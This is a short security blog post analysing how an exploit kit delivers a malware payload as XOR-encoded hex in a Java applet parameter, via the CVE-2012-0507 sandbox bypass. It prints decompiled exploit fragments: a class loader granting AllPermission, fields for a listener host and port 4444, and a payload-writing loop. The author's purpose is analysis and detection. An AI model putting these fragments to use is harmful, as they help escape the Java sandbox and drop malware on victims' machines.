New Mode of delivering Malware Payload by Exploit Kits

Huh… Exploit writers have come up with new mode of delivering malware payload.

The current pattern of exploit kit is malicious webpage -> Exploit (Java/PDF/others) -> Exploits download the malicious executable.
we have devised appropriate signatures for these patterns, malware authors has come up with new mode of delivering malware payload.

They are embedding malware payload as HEX in the malicious webpage and passing it as a parameter to the exploit.
The exploit bypasses security controls and writes the HEX as the file and runs on the victim system.

Malicious Webpage that triggering Exploit Applet, The param, converted to binary and XOR’d with 0x77, retunes an EXE

<param name="data" value="3A2DE777747777777377777788887777CF777777777777773777777…

Code that reads the Malware Payload Content

try
        {
            ConfusingClassLoader confusingclassloader = confuser.confuse(getClass().getClassLoader());
            String as[] = {
                "m.y.py", "m.y.py$pr"
            };
            String as1[] = {
                "/m/y/py.class", "/m/y/py$pr.class"
            };
            String s = getParameter("lport");
            ConfusingClassLoader.defineAndCreate(confusingclassloader, as, new byte[][] {
                loadClass(as1[0]), loadClass(as1[1])
            }, getParameter("data"), getParameter("jar"), getParameter("lhost"), s != null ? Integer.parseInt(s) : 4444);
        }

Exploit code (Java/CVE-2012-0507) that bypasses security restrictions

public static void defineAndCreate(ConfusingClassLoader confusingclassloader, String as[], byte abyte0[][], String s, String s1, String s2, int i)
        {

       try
        {
            Permissions permissions = new Permissions();
            permissions.add(new AllPermission());
            ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(null, new Certificate[0]), permissions);
            Class class1 = confusingclassloader.defineClass(as[0], abyte0[0], 0, abyte0[0].length, protectiondomain);
            confusingclassloader.defineClass(as[1], abyte0[1], 0, abyte0[1].length, protectiondomain);
            Field field = class1.getField("data");
            Field field1 = class1.getField("jar");
            Field field2 = class1.getField("lhost");
            Field field3 = class1.getField("lport");
            field.set(null, s);
            field1.set(null, s1);
            field2.set(null, s2);
            field3.set(null, Integer.valueOf(i));
            class1.newInstance();
        }

Code that writes the content to file

 try
            {
                bufferedreader = new BufferedReader(new InputStreamReader(is));
                bufferedwriter = new BufferedWriter(new OutputStreamWriter(os));
                char ac[] = new char[8192];
                int i;
                while((i = bufferedreader.read(ac, 0, ac.length)) > 0) 
                {
                   bufferedwriter.write(ac, 0, i);
                   bufferedwriter.flush();
                }
           }

Just scratching my head how to detect it?

#exploit, #javacve-2012-0507, #malware-payload-delivery

Advertisements

About Uma Mahesh

A Creator/Equilizer. Creator/Equalizers are catalysts for positive, well-organized change. They never settle for the status quo. Instead, they see the opportunity for innovation in the processes that others have long taken for granted. They respect what's already operating, but they can't help but want to improve upon it. Their special combination provides innovation tempered with profound logic. They have incredible discernment. Should their efforts fail, they are unhesitating in accepting responsibility. They don't wallow in self-pity but rather see these missed attempts as critical steps on the path to success.
This entry was posted in security and tagged , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s